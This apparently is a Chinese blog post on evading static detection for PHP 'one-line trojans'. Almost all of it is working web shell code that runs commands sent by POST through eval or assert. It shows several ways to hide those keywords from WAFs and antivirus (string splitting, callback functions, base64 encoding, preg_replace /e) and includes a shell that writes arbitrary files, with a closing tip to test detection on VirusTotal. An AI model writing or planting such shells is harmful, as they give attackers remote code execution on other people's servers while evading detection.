关于安全:一句话木马静态免杀

39次阅读

共计 1170 个字符,预计需要花费 3 分钟才能阅读完成。

1. 动态免杀(assert.eval)

<?php
eval($_POST['haha']);
?>
<?php
assert($_POST['haha']);
?>

暗藏关键字(waf 检测到 assert,eval 这个关键词,很大概率会被检测进去,那么咱们能够尝试用别的词来生成,具体的生成形式有很多种,这里列举一下常见的几种形式,其实成果都差不多。)

- 1 拆解合并

<?php
$a = "a"."s";
$b = "e"."r"."t";
$c = $a.$b;
$c($_POST['haha']);
?>
<?php
function fun1($a){$a($_POST['haha']);
}
fun1(assert);
?>
<?php
  function fun1($a){assert($a);
  }
  fun1($_POST['haha']);
?>
<?php
class me{
    public $a = '';
    function __destruct()
    {assert("$this->a");
    }
}
$obj = new me;
$obj->a = $_POST['haha'];
?>

- 2 调用函数(利用各种函数如 array_map、array_key、preg_replace、@call_user_func、substr_replace 来暗藏关键字)

<?php
@call_user_func(assert,$_POST['haha']);
?>
<?php
$a = substr_replace("assexx","rt",4);
$a($_POST['haha']);
?>
<?php
$a = $_REQUEST['haha'];
$b = "\n";
?>
<?php
function fun(){return $_POST['haha'];
}

@preg_replace("/nihao/e",fun(),"nihao woshi zj");
?>
<?php
if(isset($_POST['file'])){
    $d = 'data';
    $$d = $_POST['haha'];//$data
    $f = 'fp';
    $$f = fopen($_POST['file'],'wb');//$fp
    echo fwrite($fp,$data)?'save success':'save fail';
    fclose($fp);
}
?>

- 3 编码

<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST['haha']);
?>

- 4 冷门回调函数 array_uintersect_uassoc 函数来回调 assert

<?php 
$password = "LandGrey"; 
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); 
?>

用该网站 https://www.virustotal.com/ 测试

正文完
 0